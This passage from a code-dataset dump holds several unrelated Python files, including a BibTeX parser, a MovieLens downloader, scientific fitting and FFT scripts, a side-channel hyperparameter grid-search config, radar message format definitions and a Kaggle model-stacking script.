cleanCurlyAround\n\n_firstLinePattern = re.compile(r\"@(?P<kind>.*?){([\\s]*(?P<id>[^,\\s]+),)\")\n_fieldPattern = re.compile(\n r\"(?P<name>[\\w-]+?)[\\s]*=[\\s]*({(?P<content>.*)})\", flags=re.IGNORECASE | re.DOTALL)\n\n\ndef parse(bibfile: str, keepOnly: list = None) -> dict:\n \"\"\"\n bibfile: path to a .bib file.\n\n Returns: a dictionary where the keys are the entry IDs and the content are\n the entries, using the same fields.\n\n If keepOnly is not None, only returns those fields.\n \"\"\"\n ret = {}\n with open(bibfile, 'r', encoding=\"utf-8\") as fin:\n currentEntry = None\n for line in fin:\n match = _firstLinePattern.search(line)\n if (match):\n currentEntry = match.group(\"id\")\n ret[currentEntry] = {}\n currentField = ''\n openBraces = 0\n continue\n # blank spaces/lines, preambles, etc\n if (currentEntry is 
None):\n continue\n openBraces += (line.count('{')-line.count('}'))\n currentField = currentField+line\n if openBraces > 0:\n continue\n else:\n match = _fieldPattern.search(currentField)\n if (match):\n name = match.group(\"name\")\n if (name is not None) and ((keepOnly is None) or (name in keepOnly)):\n content = cleanCurlyAround(\n match.group(\"content\")).strip()\n ret[currentEntry][match.group(\"name\")] = content\n currentField = ''\n\n return(ret)\n","sub_path":"src/refcliq/bibtex.py","file_name":"bibtex.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332144900","text":"import requests\nimport zipfile\nimport os\n\ndef download_dataset():\n url = 'http://files.grouplens.org/datasets/movielens/ml-latest-small.zip'\n zipped_data = requests.get(url)\n with open('ml-latest-small.zip', 'wb') as outfile:\n outfile.write(zipped_data.content)\n return os.path.join(os.getcwd(), 'ml-latest-small.zip')\n\ndef unzip_file(file_path, destination_path):\n '''Simple function that takes path to zip file, unzips it and removes .zip'''\n zip_ref = zipfile.ZipFile(file_path, 'r')\n zip_ref.extractall(destination_path)\n zip_ref.close()\n os.remove(file_path)\n\nif __name__ == \"__main__\":\n file_path = download_dataset()\n unzip_file(file_path, os.getcwd())","sub_path":"movies/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113355596","text":"#!/usr/bin/env python3\ndef orderBeer(age, beersHad):\n if age < 16:\n print(f'Get outta here. You are only {age} y.o.')\n elif beersHad > 5:\n print(f'Go home! You are drunk, you had {beersHad} beers dude.')\n else:\n beersHad += 1\n print(f'Here is your beer. 
Enjoy!')\n return beersHad\n","sub_path":"beers.py","file_name":"beers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158209248","text":"import numpy as np,matplotlib.pyplot as plt\r\nimport time\r\n\r\n#start = time.time()\r\n#e_time = np.array([])\r\n\r\nmu , sigma = 0 , 0.005 # noise parameters\r\nepsilon , length = 1.0 , 35.0 # experimental setup parameters\r\ndiffusivity = 1.5 # target parameter\r\n\r\nd_e = np.round(np.linspace(1.0,3.0,2),2) # parameter search range\r\nk_a = np.round(np.linspace(-1,1,3),2)\r\n\r\n\r\n# function definitions below\r\n###############################################################################\r\n\r\ndef reader(mu , sigma , epsilon , length , diffusivity):\r\n folder = f\"./mu={mu},sigma={sigma}/\"\r\n file = folder+f\"artificial_data_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.dat\"\r\n\r\n dimensional_time = np.array([])\r\n dimensional_flow = np.array([])\r\n #count = 0\r\n for line in open(file,\"r\"):\r\n data = line.split(\"\\t\")\r\n dimensional_time = np.append(dimensional_time,float(data[0]))\r\n dimensional_flow = np.append(dimensional_flow,float(data[1]))\r\n #print(dimensional_time,dimensional_flow)\r\n # count += 1\r\n # if count==1000:\r\n # break\r\n\r\n return dimensional_time , dimensional_flow# , count\r\n\r\ndef dimensionless(dimensional_time , dimensional_flow , diffusivity=diffusivity, epsilon=epsilon , length=length):\r\n dimensionless_time = np.array([])\r\n dimensionless_flow = np.array([])\r\n dimensionless_time = ( diffusivity/(epsilon*np.power(length,2)) )*dimensional_time\r\n dimensionless_flow = ( (epsilon*np.power(length,2))/diffusivity )*dimensional_flow\r\n\r\n return dimensionless_time , dimensionless_flow\r\n\r\ndef standard_diffusion_curve(dimensionless_time,k_a):\r\n sdc = np.array([])\r\n for time in dimensionless_time:\r\n exit_flow = 0.0\r\n for n in range(100):\r\n exit_flow += np.pi*np.power(-1,n)*(2*n+1)*np.exp(-np.power(n+0.5,2)*np.power(np.pi,2)*time)\r\n exit_flow *= np.exp(-k_a*time)\r\n sdc = np.append(sdc,exit_flow)\r\n\r\n return sdc\r\n\r\ndef method_of_least_squares(dimensionless_flow, sdc):\r\n error = 0.0\r\n for artificial_data , standard_diffusion_curve in zip(dimensionless_flow,sdc):\r\n error += np.power(artificial_data - standard_diffusion_curve,2)\r\n\r\n return error\r\n\r\ndef file_writer(d_e , k_a , squared_error):\r\n #file = f\"./mu={mu},sigma={sigma}/squared_error_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.dat\"\r\n file = \"sample.dat\"\r\n with open(file,\"w\") as fileobj:\r\n for i in range(len(d_e)):\r\n for j in range(len(k_a)):\r\n fileobj.write(str(d_e[i]))\r\n fileobj.write(\"\\t\")\r\n fileobj.write(str(k_a[j]))\r\n fileobj.write(\"\\t\")\r\n fileobj.write(str(squared_error[i,j]))\r\n fileobj.write(\"\\n\")\r\n fileobj.write(\"\\n\")\r\n\r\n return None\r\n\r\ndef graph_plot(d_e , squared_error):\r\n folder = f\"./mu={mu},sigma={sigma}/\"\r\n file = folder+f\"squared_error_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.png\"\r\n plt.plot(d_e,squared_error)\r\n plt.xlabel(\"Diffusivity[$mm^2/ms$]\")\r\n plt.ylabel(\"Squared Error\")\r\n plt.grid(True)\r\n plt.savefig(file)\r\n plt.show()\r\n\r\n return None\r\n\r\n###############################################################################\r\n\r\n\r\ndimensional_time , dimensional_flow = reader(mu=mu,sigma=sigma,epsilon=epsilon,length=length,diffusivity=diffusivity)\r\n\r\nsquared_error = np.array([])\r\n\r\nfor 
d in d_e:\r\n for ka in k_a:\r\n dimensionless_time , dimensionless_flow = dimensionless(diffusivity=d,dimensional_time=dimensional_time,dimensional_flow=dimensional_flow)\r\n sdc = standard_diffusion_curve(dimensionless_time=dimensionless_time , k_a = ka)\r\n error = method_of_least_squares(dimensionless_flow=dimensionless_flow , sdc=sdc)\r\n squared_error = np.append(squared_error,error)\r\n\r\n # step = time.time()\r\n # elapsed_time = step-start\r\n # e_time = np.append(e_time,elapsed_time)\r\n\r\nsquared_error = squared_error.reshape(len(d_e) , len(k_a))\r\n\r\nfile_writer(d_e=d_e , k_a=k_a , squared_error=squared_error)\r\n\r\n#graph_plot(d_e=d_e , squared_error=squared_error)\r\n\r\n# end = time.time()\r\n# elapsed_time = end - start\r\n# e_time = np.append(e_time,elapsed_time)\r\n# print(f\"elapsed time : {elapsed_time}[sec]\")\r\n\r\n#plt.plot(e_time)\r\n#plt.show()\r\n\r\n# for i in range(count):\r\n# print(\"time[\"+str(i)+\"]=\",dimensional_time[i],\"flow[\"+str(i)+\"]=\",dimensional_flow[i])\r\n# print(\"d_time[\"+str(i)+\"]=\",dimensionless_time[i],\"d_flow[\"+str(i)+\"]=\",dimensionless_flow[i])\r\n# print(\"d_time[\"+str(i)+\"]=\",dimensionless_time[i],\"sdc[\"+str(i)+\"]=\",sdc[i])\r\n# print(\"\\n\")\r\n\r\n#print(squared_error)\r\n\r\n#graph_plot(dimensionless_time=dimensionless_time , dimensionless_flow=dimensionless_flow , sdc=sdc)\r\n","sub_path":"method_of_least_squares_IRmodel.py","file_name":"method_of_least_squares_IRmodel.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3240450","text":"#!/usr/bin/env python3\n\"\"\"Calculate the probability density function of Gaussian distribution\"\"\"\nimport numpy as np\n\n\ndef pdf(X, m, S):\n \"\"\"Calculate the probability density function of Gaussian distribution\n @X: np.ndarray shape(n,d) data points whose PDF should be evaluated\n @m: np.ndarray shape(d,) mean of distribution\n @S: np.ndarray shape(d,d) covariance of the distribution\n Return: P or None on failure\n @P: np.ndarray of shape(n,) the PDF values for each data point\n \"\"\"\n if not isinstance(X, np.ndarray) or len(X.shape) != 2:\n return None\n if not isinstance(m, np.ndarray) or len(m.shape) != 1:\n return None\n if not isinstance(S, np.ndarray) or len(S.shape) != 2:\n return None\n d = X.shape[1]\n if m.shape[0] != d or S.shape[0] != S.shape[1] or S.shape[0] != d:\n return None\n det = np.linalg.det(S)\n p1 = 1 / ((2 * np.pi) ** (d / 2) * det ** 0.5)\n Xm = X - m\n X_t = np.linalg.inv(S) @ Xm.T\n\n p2 = np.exp(-0.5 * np.sum(Xm * X_t.T, axis=1))\n P = p1 * p2.T\n return np.where(P <= 1e-300, 1e-300, P)\n","sub_path":"unsupervised_learning/0x01-clustering/5-pdf.py","file_name":"5-pdf.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25355522","text":"import aisy_sca\nfrom app import *\n\naisy = aisy_sca.Aisy()\naisy.set_resources_root_folder(resources_root_folder)\naisy.set_database_root_folder(databases_root_folder)\naisy.set_datasets_root_folder(datasets_root_folder)\naisy.set_database_name(\"database_ascad.sqlite\")\naisy.set_dataset(datasets_dict[\"ascad-variable.h5\"])\naisy.set_aes_leakage_model(leakage_model=\"HW\", byte=2)\naisy.set_batch_size(400)\naisy.set_epochs(20)\n\n# for each hyper-parameter, specify the options in the grid search\ngrid_search = {\n \"neural_network\": \"cnn\",\n \"hyper_parameters_search\": {\n 'conv_layers': [1, 2],\n 
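
A quick sanity check for the `pdf` function in the `5-pdf.py` record above: the closed-form multivariate normal density it implements should agree with `scipy.stats.multivariate_normal` (scipy is an assumption here; the source itself only uses numpy):

```python
import numpy as np
from scipy.stats import multivariate_normal

# Re-derive the same closed form as 5-pdf.py and compare with scipy.
rng = np.random.default_rng(0)
X = rng.normal(size=(5, 3))          # 5 points in 3 dimensions
m = np.zeros(3)                      # mean
S = 2.0 * np.eye(3)                  # covariance

det = np.linalg.det(S)
p1 = 1 / ((2 * np.pi) ** (3 / 2) * det ** 0.5)
Xm = X - m
P = p1 * np.exp(-0.5 * np.sum(Xm * (np.linalg.inv(S) @ Xm.T).T, axis=1))

assert np.allclose(P, multivariate_normal(mean=m, cov=S).pdf(X))
```
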
'kernel_1': [4, 8],\n 'kernel_2': [2, 4],\n 'stride_1': [1],\n 'stride_2': [1],\n 'filters_1': [8, 16],\n 'filters_2': [8, 16],\n 'pooling_type_1': [\"Average\", \"Max\"],\n 'pooling_type_2': [\"Average\", \"Max\"],\n 'pooling_size_1': [1, 2],\n 'pooling_size_2': [1, 2],\n 'pooling_stride_1': [1, 2],\n 'pooling_stride_2': [1, 2],\n 'neurons': [100, 200],\n 'layers': [3, 4],\n 'learning_rate': [0.001],\n 'activation': [\"selu\", \"elu\"],\n 'optimizer': [\"Adam\", \"SGD\"]\n },\n \"metric\": \"guessing_entropy\",\n \"stop_condition\": False,\n \"stop_value\": 1.0,\n \"train_after_search\": True\n}\n\naisy.run(\n grid_search=grid_search,\n key_rank_attack_traces=500\n)\n","sub_path":"scripts/script_aes_grid_search.py","file_name":"script_aes_grid_search.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424507908","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"PulsON 440 message formats.\"\"\"\n\n__author__ = \"Ramamurthy Bhagavatula\"\n__version__ = \"1.0\"\n__maintainer__ = \"Ramamurthy Bhagavatula\"\n__email__ = \"ramamurthy.bhagavatula@ll.mit.edu\"\n\n\"\"\"References\n[1] Monostatic Radar Application Programming Interface (API) Specification\n PulsON (R) 400 Series\n Version: 1.2.2\n Date: January 2015\n https://timedomain.com/wp-content/uploads/2015/12/320-0298E-MRM-API-Specification.pdf\n\"\"\"\n\n# Import required modules and methods\nfrom collections import OrderedDict\nimport numpy as np\nfrom pulson440.constants import REC_ANTENNA_MODE, REC_PERSIST_FLAG, REC_SCAN_RES, RESERVED_VAL, \\\n NOT_IMPLEMENTED_VAL\n\n# Formats of various messages between host and radar. Each one is defined by a message type and a \n# packet definition. A packet definition is an order dictionary specifying the order of the packet\n# fields. The values in these dictionaries depend on whether the message is for host to radar \n# messages or for radar to host messages.\n# \n# For host to radar messages each key's value is a 2 element list where the first element is the \n# data type and the second value is the default value. If the default value is None then this part \n# of the packet must be user defined otherwise the default value is used.\n#\n# For radar to host messages each key's value is the data type. 
This difference in format is to \n# ensure the right message format is used for the right direction of communication.\n\n# Set radar configuration request; host to radar\nMRM_SET_CONFIG_REQUEST = {'message_type': 4097, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None]), # Message ID\n ('node_id', [np.dtype(np.uint32), None]), # Node ID\n ('scan_start', [np.dtype(np.int32), None]), # Scan start time (ps)\n ('scan_stop', [np.dtype(np.int32), None]), # Scan stop time (ps)\n ('scan_res', [np.dtype(np.uint16), REC_SCAN_RES]), # Scan resolution (bins); recommended value used\n ('pii', [np.dtype(np.uint16), None]), # Pulse integration index\n ('seg_1_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 1 samples; not used\n ('seg_2_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 2 samples; not used\n ('seg_3_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 3 samples; not used\n ('seg_4_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 4 samples; not used\n ('seg_1_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 1 integration; not used\n ('seg_2_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 2 integration; not used\n ('seg_3_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 3 integration; not used\n ('seg_4_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 4 integration; not used\n ('ant_mode', [np.dtype(np.uint8), REC_ANTENNA_MODE]), # Antenna mode; recommended value used\n ('tx_gain_ind', [np.dtype(np.uint8), None]), # Transmit gain index\n ('code_channel', [np.dtype(np.uint8), None]), # Code channel\n ('persist_flag', [np.dtype(np.uint8), REC_PERSIST_FLAG])])} # Persist flag\nMRM_SET_CONFIG_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_SET_CONFIG_REQUEST['packet_def'].values()])\n\n# Set radar configuration confirmation; radar to host\nMRM_SET_CONFIG_CONFIRM = {'message_type': 4353, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('status', np.dtype(np.uint32))])} # Set configuration status\nMRM_SET_CONFIG_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_SET_CONFIG_CONFIRM['packet_def'].values()])\n\n# Get radar configuration request; host to radar\nMRM_GET_CONFIG_REQUEST = {'message_type': 4098, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None])])} # Message ID\nMRM_GET_CONFIG_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_GET_CONFIG_REQUEST['packet_def'].values()])\n\n# Set radar configuration request; radar to host\nMRM_GET_CONFIG_CONFIRM = {'message_type': 4354, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('node_id', np.dtype(np.uint32)), # Node ID\n ('scan_start', np.dtype(np.int32)), # Scan start time (ps)\n ('scan_stop', np.dtype(np.int32)), # Scan stop time (ps)\n ('scan_res', np.dtype(np.uint16)), # Scan resolution (bins); recommended value used\n ('pii', np.dtype(np.uint16)), # Pulse integration index\n ('seg_1_samp', np.dtype(np.uint16)), # Segment 1 samples; not used\n ('seg_2_samp', np.dtype(np.uint16)), # Segment 2 samples; not used\n 
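
To make the `packet_def` convention above concrete: for host-to-radar messages each field maps to `[dtype, default]`, where a `None` default marks a caller-supplied value. A hypothetical serializer sketch (`pack_message` is not part of the source, and the real MRM protocol defines its own byte order, which numpy's host-order `tobytes()` below does not enforce):

```python
import numpy as np

def pack_message(packet_def, user_fields):
    # Hypothetical sketch: flatten an OrderedDict of
    # name -> [dtype, default] into raw bytes, field by field.
    chunks = []
    for name, (dtype, default) in packet_def.items():
        value = user_fields[name] if default is None else default
        chunks.append(np.asarray(value, dtype=dtype).tobytes())
    return b''.join(chunks)

# e.g. pack_message(MRM_GET_CONFIG_REQUEST['packet_def'],
#                   {'message_type': 4098, 'message_id': 1})
```
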
('seg_3_samp', np.dtype(np.uint16)), # Segment 3 samples; not used\n ('seg_4_samp', np.dtype(np.uint16)), # Segment 4 samples; not used\n ('seg_1_int', np.dtype(np.uint8)), # Segment 1 integration; not used\n ('seg_2_int', np.dtype(np.uint8)), # Segment 2 integration; not used\n ('seg_3_int', np.dtype(np.uint8)), # Segment 3 integration; not used\n ('seg_4_int', np.dtype(np.uint8)), # Segment 4 integration; not used\n ('ant_mode', np.dtype(np.uint8)), # Antenna mode; recommended value used\n ('tx_gain_ind', np.dtype(np.uint8)), # Transmit gain index\n ('code_channel', np.dtype(np.uint8)), # Code channel\n ('persist_flag', np.dtype(np.uint8)), # Persist flag\n ('timestamp', np.dtype(np.uint32)), # Time since boot (ms)\n ('status', np.dtype(np.uint32))])} # Status\nMRM_GET_CONFIG_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_GET_CONFIG_CONFIRM['packet_def'].values()])\n\n# Radar scan request; host to radar\nMRM_CONTROL_REQUEST = {'message_type': 4099, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None]), # Message ID\n ('scan_count', [np.dtype(np.uint16), None]), # Scan count\n ('reserved', [np.dtype(np.uint16), RESERVED_VAL]), # Reserved\n ('scan_interval', [np.dtype(np.uint32), None])])} # Scan interval (us)\nMRM_CONTROL_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_CONTROL_REQUEST['packet_def'].values()])\n\n# Radar scan confirm; radar to host\nMRM_CONTROL_CONFIRM = {'message_type': 4355, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('status', np.dtype(np.uint32))])} # Status \nMRM_CONTROL_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_CONTROL_CONFIRM['packet_def'].values()])\n\n# Radar reboot request; host to radar\nMRM_REBOOT_REQUEST = {'message_type': 61442, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None])])} # Message ID\nMRM_REBOOT_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_REBOOT_REQUEST['packet_def'].values()])\n\n# Radar reboot confirm; radar to host\nMRM_REBOOT_CONFIRM = {'message_type': 61698, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16))])} # Message ID\nMRM_REBOOT_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_REBOOT_CONFIRM['packet_def'].values()])\n\n# Scan data; radar to host\nMRM_SCAN_INFO = {'message_type': 61953, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('node_id', np.dtype(np.uint32)), # Node ID\n ('timestamp', np.dtype(np.uint32)), # Time since boot (ms)\n ('reserved0', np.dtype(np.uint32)), # Reserved\n ('reserved1', np.dtype(np.uint32)), # Reserved\n ('reserved2', np.dtype(np.uint32)), # Reserved\n ('reserved3', np.dtype(np.uint32)), # Reserved\n ('scan_start', np.dtype(np.int32)), # Scan start time (ps)\n ('scan_stop', np.dtype(np.int32)), # Scan stop time (ps)\n ('scan_res', np.dtype(np.int16)), # Scan resolution (bins)\n ('scan_type', np.dtype(np.uint8)), # Type of scan data\n ('reserved4', np.dtype(np.uint8)), # 
Reserved\n ('antenna_id', np.dtype(np.uint8)), # Receiving antenna designator\n ('operational_mode', np.dtype(np.uint8)), # Operational mode\n ('num_samples_message', np.dtype(np.uint16)), # Number of samples in this message\n ('num_samples_total', np.dtype(np.uint32)), # Number of samples in single scan\n ('message_index', np.dtype(np.uint16)), # Index of this message's portion of data in single scan\n ('num_messages_total', np.dtype(np.uint16)), # Number of data messages in single scan\n ('scan_data', np.dtype(np.int32))])} # Scan data\nMRM_SCAN_INFO['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_SCAN_INFO['packet_def'].values()])","sub_path":"raw_code/pulson440/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513682230","text":"#!/usr/bin/env python\n\nfrom glob import glob\nimport nipype.interfaces.fsl as fsl\nimport os\n\nif __name__ == '__main__':\n\n try:\n taskid = os.environ['SGE_TASK_ID']\n except:\n raise IOError('Are you using SGE??')\n\n basedir = '/home/jagust/fmri-pstask/subjects/'\n subjects = sorted(glob(os.path.join(basedir, 'B*')))\n ysubjects = sorted(glob(os.path.join(basedir, 'young/B14*')))\n for y in ysubjects:\n subjects.append(y)\n\n subj = subjects[int(taskid)-1]\n _, sname = os.path.split(subj)\n roidir = os.path.join(subj, 'rois')\n if os.path.isdir(roidir):\n maskfiles = sorted(glob(os.path.join(roidir, 'PSE-0.75/subfields/*')))\n outfiles = sorted(glob(os.path.join(roidir, 'newmodel/template_space/*nii.gz')))\n for maskfile in maskfiles:\n _, rname = os.path.split(maskfile)\n name2, ext1, ext2 = rname.split('.')\n for outname in outfiles:\n _, oname = os.path.split(outname)\n name1, ext1, ext2 = oname.split('.')\n mname = '{}_{}'.format(name1, name2)\n maskoutname = os.path.join(roidir, 'newmodel/template_space/{}.nii.gz'.format(mname))\n mask = fsl.ApplyMask(in_file=outname, mask_file=maskfile, out_file=maskoutname)\n mask.run()\n for outfile in outfiles:\n os.remove(outfile)\n","sub_path":"extract_mean_func.py","file_name":"extract_mean_func.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481888617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 31 00:55:38 2014\n\n@author: Ankur\n\"\"\"\n\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\n\n\nclass PhaseImportance():\n \n def __init__(self,filename1=None,filename2=None):\n if filename1 is None or filename2 is None:\n raise Exception(\"filename not given as first param\")\n \n self.image1 = scipy.misc.imread(filename1)\n self.image2 = scipy.misc.imread(filename2)\n \n self.G = None\n self.H = None\n self.K = None\n self.centerG = None\n self.centerH = None\n \n def run(self):\n self.calculate_fft()\n \n \n def calculate_fft(self):\n #take transform and bring it to origin\n self.G = np.fft.fft2(self.image1)\n self.centerG = np.fft.fftshift(self.G)\n \n #take transform and bring it to origin\n self.H = np.fft.fft2(self.image2)\n self.centerH = np.fft.fftshift(self.H)\n \n self.construct_wave()\n \n def construct_wave(self):\n \n phase = self.find_phase() \n magnitude = self.magnitude()\n\n #re = magnitude/np.sqrt(1+np.square(np.tan(phase)))\n re = magnitude*np.cos(phase)\n im = magnitude*np.sin(phase)\n \n final_wave = re + 1j*im\n\n finimage = np.abs(np.fft.ifft2(final_wave))\n 
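
The real/imaginary construction in the `task1_3.py` record above is Euler's formula written out: `magnitude*cos(phase) + 1j*magnitude*sin(phase)` equals `magnitude * exp(1j*phase)`. An equivalent compact sketch (not from the source):

```python
import numpy as np

def combine(magnitude_src, phase_src):
    # Take |G| from one image and the phase of H from the other,
    # then invert: |G| * e^{i*angle(H)}.
    G = np.fft.fftshift(np.fft.fft2(magnitude_src))
    H = np.fft.fftshift(np.fft.fft2(phase_src))
    return np.abs(np.fft.ifft2(np.abs(G) * np.exp(1j * np.angle(H))))
```
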
self.save_image(\"task1_3.jpg\",finimage)\n \n #plotting functions\n plt.subplot(221),plt.imshow(finimage, cmap = 'gray')\n plt.xticks([]), plt.yticks([])\n plt.title(\"Final-Image\")\n plt.show()\n \n def magnitude(self):\n return np.abs(self.centerG)\n \n def find_phase(self):\n #this is in radians\n return np.angle(self.centerH)\n \n def save_image(self,name,imarray):\n scipy.misc.imsave(name,imarray)\n\nif __name__ == \"__main__\":\n obj = PhaseImportance(\"bauckhage.jpg\",\"clock.jpg\")\n obj.run()","sub_path":"project1/task_1.3/task1_3.py","file_name":"task1_3.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"293441660","text":"import pandas as pd\nimport numpy as np\nimport scipy as sp\n\nimport argparse\nimport os\nimport gc\nimport time\n\nfrom base import *\nfrom features import *\n\nfrom datetime import datetime\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold\n\nbasepath = os.path.expanduser('../')\n\nSEED = 1231\nnp.random.seed(SEED)\n\n#############################################################################################################\n# EXPERIMENT PARAMETERS # \n#############################################################################################################\n\nPARAMS = {\n 'C': 1.,\n 'solver': 'lbfgs',\n 'n_jobs': -1,\n 'random_state': SEED\n}\n\nMODEL_FILENAME = 'v135'\nSAMPLE_SIZE = .3\n\nclass Modelv135(BaseModel):\n def __init__(self, **params):\n self.params = params\n self.n_train = 307511 # TODO: find a way to remove this constant\n \n def load_data(self, filenames):\n dfs = []\n \n for filename in filenames:\n dfs.append(np.load(os.path.join(basepath, self.params['output_path'] + self.params['data_folder'] + f'{filename}')))\n \n dfs = np.hstack(dfs) # concat across column axis\n\n df = pd.DataFrame(dfs)\n \n df.columns = [f'f_{i}' for i in range(dfs.shape[1])] \n df.index = np.arange(len(df))\n\n return df\n \n def reduce_mem_usage(self, df):\n return super(Modelv135, self).reduce_mem_usage(df)\n \n def get_features(self, train, test):\n data = pd.concat((train, test))\n data.index = np.arange(len(data))\n n_features = data.shape[1]\n\n # t0 = time.time()\n\n # feature interaction\n # for i in range(n_features):\n # for j in range(i+1, n_features):\n # data.loc[:, f'f_{i}{j}'] = data.iloc[:, i] - data.iloc[:, j]\n \n # print('Took: {} seconds to generate feature interactions'.format(time.time() - t0))\n\n return data\n\n # This method would perform feature engineering on merged datasets.\n def fe(self, train, test):\n original_train = train.copy()\n data = self.get_features(original_train, test)\n\n train = data.iloc[:len(train)]\n test = data.iloc[len(train):]\n\n del data, original_train\n gc.collect()\n\n return train, test\n\n def train(self, train, test, feature_list, is_eval, TARGET_NAME='TARGET', **params):\n X = train.loc[:, feature_list]\n y = train.loc[:, TARGET_NAME]\n \n Xte = test.loc[:, feature_list]\n yte = []\n\n if is_eval:\n yte = test.loc[:, TARGET_NAME]\n \n return super(Modelv135, self).train_log(X, y, Xte, yte, **params)\n\n def evaluate(self, test, feature_list, is_eval, model, TARGET_NAME='TARGET'):\n Xte = test.loc[:, feature_list]\n yte = []\n\n if is_eval:\n yte = test.loc[:, TARGET_NAME]\n\n return super(Modelv135, self).evaluate_log(Xte, yte, model)\n\n\n def predict_test(self, train, test, feature_list, params, save_path, n_folds=5):\n return super(Modelv135, 
self).predict_test_xgb(train, test, feature_list, params, save_path, n_folds=n_folds)\n\n\n def cross_validate(self, train, feature_list, params, cv_adversarial_filepath=None, TARGET_NAME='TARGET'):\n Xtr = train.loc[:, feature_list]\n ytr = train.loc[:, TARGET_NAME]\n\n return super(Modelv135, self).cross_validate_log(Xtr, ytr, params, cv_adversarial_filepath=cv_adversarial_filepath)\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Home Credit Default Risk Solution')\n \n parser.add_argument('-input_path', help='Path to input directory') # path to raw files\n parser.add_argument('-output_path', help='Path to output directory') # path to working data folder \n parser.add_argument('-data_folder', help='Folder name of the dataset') # dataset folder name\n parser.add_argument('-cv', type=bool, help='Cross Validation')\n parser.add_argument('-t',type=bool, help='Full Training on a given seed.')\n parser.add_argument('-s', type=bool, help='Whether to work on a sample or not.')\n parser.add_argument('-seed', type=int, help='Random SEED')\n parser.add_argument('-cv_seed', type=int, help='CV SEED')\n \n args = parser.parse_args()\n\n if args.cv:\n print('Cross validation on training and store parameters and cv score on disk ...')\n \n train_filenames = [\n 'v127_4457_oof_train_preds.npy',\n 'v128_4457_oof_train_preds.npy',\n 'v136_4457_oof_train_preds.npy'\n ]\n\n test_filenames = [\n 'v127_4457_test_preds.npy',\n 'v128_4457_test_preds.npy',\n 'v136_4457_test_preds.npy'\n ]\n\n input_path = args.input_path\n output_path = args.output_path\n data_folder = args.data_folder\n is_sample = args.s\n SEED = args.seed\n\n params = {\n 'input_path': input_path,\n 'output_path': output_path,\n 'data_folder': data_folder\n }\n\n m = Modelv135(**params)\n \n train = m.load_data(train_filenames)\n test = m.load_data(test_filenames)\n\n train, test = m.fe(train, test)\n\n # load 